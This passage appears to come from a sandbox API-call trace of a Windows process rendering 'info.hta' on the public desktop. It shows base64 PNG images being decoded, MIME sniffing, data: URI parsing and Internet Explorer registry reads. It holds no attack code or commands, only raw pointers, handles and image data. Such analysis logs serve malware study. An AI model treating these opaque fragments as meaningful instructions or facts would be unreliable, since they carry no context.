rCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x5c1 [0227.901] CryptStringToBinaryW (in: pszString="iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", cchString=0x5b0, dwFlags=0x1, pbBinary=0x58b678, pcbBinary=0x14cca4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x58b678, pcbBinary=0x14cca4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0227.901] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x585900 [0227.901] GetProcessHeap () returned 0x510000 [0227.901] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x443) returned 0x58bb10 [0227.901] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x58b678 | out: hHeap=0x510000) returned 1 [0227.901] lstrlenW (lpString="") returned 0 [0227.901] lstrlenW (lpString="image/png") returned 9 [0227.901] lstrlenW (lpString="") returned 0 [0227.901] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0227.901] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x443) returned 0x58b678 [0227.901] lstrlenW (lpString="image/png") returned 9 [0227.901] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x58b678, cbSize=0x443, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x58b4b8, dwReserved=0x0 | out: ppwzMimeOut=0x58b4b8*="image/x-png") returned 0x0 [0227.901] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0227.901] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0227.901] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x58b678 | out: hHeap=0x510000) returned 1 [0227.902] IUnknown:Release (This=0x53d8ec) returned 0x9 [0227.902] IUnknown:Release (This=0x53d8ec) returned 0x8 [0227.902] IUnknown:Release (This=0x53d8ec) returned 0x7 [0227.902] CoTaskMemFree (pv=0x0) [0227.902] GetCurrentThreadId () returned 0xc4 [0227.902] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xb92) returned 0x58bf60 [0227.902] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57d560 [0227.902] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4a8) returned 0x58cb00 [0227.902] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x98) returned 0x54afb0 [0227.902] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x274 [0227.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x54afb0, dwCreationFlags=0x0, lpThreadId=0x54afc4 | out: lpThreadId=0x54afc4*=0x29c) returned 0x278 [0227.904] GetCurrentThreadId () returned 0xc4 [0227.904] SetEvent (hEvent=0x274) returned 1 [0227.904] IUnknown:Release (This=0x53d8ec) returned 0x6 [0227.904] IUnknown:Release (This=0x53d8ec) returned 0x5 [0227.904] IUnknown:AddRef (This=0x53d8ec) returned 0x6 [0227.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d0dc | out: phkResult=0x14d0dc*=0x27c) returned 0x0 [0227.905] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d0e0 | out: phkResult=0x14d0e0*=0x280) returned 0x0 [0227.905] RegOpenKeyExW (in: hKey=0x280, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x14d09c | out: phkResult=0x14d09c*=0x0) returned 0x2 [0227.905] RegOpenKeyExW (in: hKey=0x27c, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x14d09c | out: phkResult=0x14d09c*=0x284) returned 0x0 [0227.905] SHRegGetValueW () returned 0x2 [0227.905] SHRegGetValueW () returned 0x2 [0227.905] RegCloseKey (hKey=0x284) returned 0x0 [0227.905] RegCloseKey (hKey=0x0) returned 0x6 [0227.905] RegCloseKey (hKey=0x0) returned 0x6 [0227.905] RegCloseKey (hKey=0x27c) returned 0x0 [0227.905] RegCloseKey (hKey=0x280) returned 0x0 [0227.905] IUnknown:Release (This=0x53d8ec) returned 0x5 [0228.276] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x14d180 | out: ppu=0x14d180) returned 0x0 [0228.276] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d180 | out: ppURI=0x14d180*=0x53d9c4) returned 0x0 [0228.276] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14d010 | out: ppu=0x14d010) returned 0x0 [0228.276] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d0cc | out: ppURI=0x14d0cc*=0x53c4ac) returned 0x0 [0228.276] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d094 | out: ppvObject=0x14d094*=0x53c4ac) returned 0x0 [0228.276] IUnknown:Release (This=0x53c4ac) returned 0xd [0228.276] IUnknown:AddRef (This=0x53c4ac) returned 0xe [0228.276] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x53d9c4, dwCombineFlags=0x6000000, ppCombinedUri=0x14d100, dwReserved=0x0 | out: ppCombinedUri=0x14d100*=0x53d9c4) returned 0x0 [0228.276] IUnknown:Release (This=0x53c4ac) returned 0xd [0228.276] IUnknown:Release (This=0x53c4ac) returned 0xc [0228.277] IUnknown:QueryInterface (in: This=0x53d9c4, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d054 | out: ppvObject=0x14d054*=0x53d9c4) returned 0x0 [0228.277] IUnknown:Release (This=0x53d9c4) returned 0x3 [0228.277] IUnknown:AddRef (This=0x53d9c4) returned 0x4 [0228.277] IUri:GetAbsoluteUri (in: This=0x53d9c4, pbstrAbsoluteUri=0x14d048 | out: pbstrAbsoluteUri=0x14d048*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.277] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xf4) returned 0x590390 [0228.277] IUnknown:AddRef (This=0x53d9c4) returned 0x5 [0228.277] IUnknown:QueryInterface (in: This=0x53d9c4, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d01c | out: ppvObject=0x14d01c*=0x53d9c4) returned 0x0 [0228.277] IUnknown:Release (This=0x53d9c4) returned 0x5 [0228.277] IUnknown:AddRef (This=0x53d9c4) returned 0x6 [0228.277] IUri:GetScheme (in: This=0x53d9c4, pdwScheme=0x14d068 | out: pdwScheme=0x14d068*=0x0) returned 0x0 [0228.277] IUnknown:Release (This=0x53d9c4) returned 0x5 [0228.277] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x57a590 [0228.277] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x5549f0 [0228.277] IInternetSecurityManager:MapUrlToZone (in: This=0x542e68, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14d060, dwFlags=0x0 | out: pdwZone=0x14d060*=0x0) returned 0x0 [0228.278] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1b0) returned 0x5984c8 [0228.278] IUnknown:QueryInterface (in: This=0x53d9c4, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd5c | out: ppvObject=0x14cd5c*=0x53d9c4) returned 0x0 [0228.278] IUnknown:Release (This=0x53d9c4) returned 0x5 [0228.278] IUnknown:AddRef (This=0x53d9c4) returned 0x6 [0228.278] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x14cd20 | out: ppu=0x14cd20) returned 0x0 [0228.278] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.278] IUnknown:AddRef (This=0x53d9c4) returned 0x7 [0228.278] IUnknown:AddRef (This=0x53d9c4) returned 0x8 [0228.278] IUnknown:QueryInterface (in: This=0x53d9c4, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd50 | out: ppvObject=0x14cd50*=0x53d9c4) returned 0x0 [0228.278] IUnknown:Release (This=0x53d9c4) returned 0x8 [0228.278] IUnknown:AddRef (This=0x53d9c4) returned 0x9 [0228.278] IUri:GetScheme (in: This=0x53d9c4, pdwScheme=0x5985d0 | out: pdwScheme=0x5985d0*=0x0) returned 0x0 [0228.278] IUri:GetSchemeName (in: This=0x53d9c4, pbstrSchemeName=0x14cd50 | out: pbstrSchemeName=0x14cd50*="data") returned 0x0 [0228.278] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.278] IUnknown:QueryInterface (in: This=0x53d9c4, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd5c | out: ppvObject=0x14cd5c*=0x53d9c4) returned 0x0 [0228.278] IUnknown:Release (This=0x53d9c4) returned 0x9 [0228.278] IUnknown:AddRef (This=0x53d9c4) returned 0xa [0228.278] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x57d6f8 [0228.278] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1bc) returned 0x598680 [0228.278] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14cccc | out: ppURI=0x14cccc*=0x53d9c4) returned 0x0 [0228.278] IUri:GetSchemeName (in: This=0x53d9c4, pbstrSchemeName=0x14ccac | out: pbstrSchemeName=0x14ccac*="data") returned 0x0 [0228.279] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.279] IUri:GetPathAndQuery (in: This=0x53d9c4, pbstrPathAndQuery=0x14ccd8 | out: pbstrPathAndQuery=0x14ccd8*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.279] IUnknown:Release (This=0x53d9c4) returned 0xa [0228.279] SysStringLen 